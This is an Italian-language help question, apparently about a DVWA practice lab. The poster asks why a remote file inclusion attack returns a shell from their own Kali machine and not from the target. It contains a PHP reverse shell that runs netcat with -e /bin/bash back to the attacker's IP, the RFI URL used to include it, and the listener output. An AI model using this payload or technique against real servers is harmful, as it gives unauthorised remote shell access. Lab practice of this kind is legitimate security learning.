Nel tentativo di sfruttare la debolezza di RFI sto eseguendo Apache sulla mia casella Kali per ospitare la shell inversa di php e la shell era backconnect per me (la mia macchina kali).
Perché ricevo una shell dalla mia macchina Kali invece che dal server web di destinazione?
La shell inversa php: shell.php
<?php echo shell_exec('nc -e /bin/bash <Kali IP> 4444'); ?>
Lo sfruttamento di RFI:
http://<Target IP>/vulnerabilities/fi/?page=http://<Kali IP>/shell.php
Quando corro:
nc -nlvp 4444
connect to [192.168.60.2] from (UNKNOWN) [192.168.60.2] 46654
hostname
kali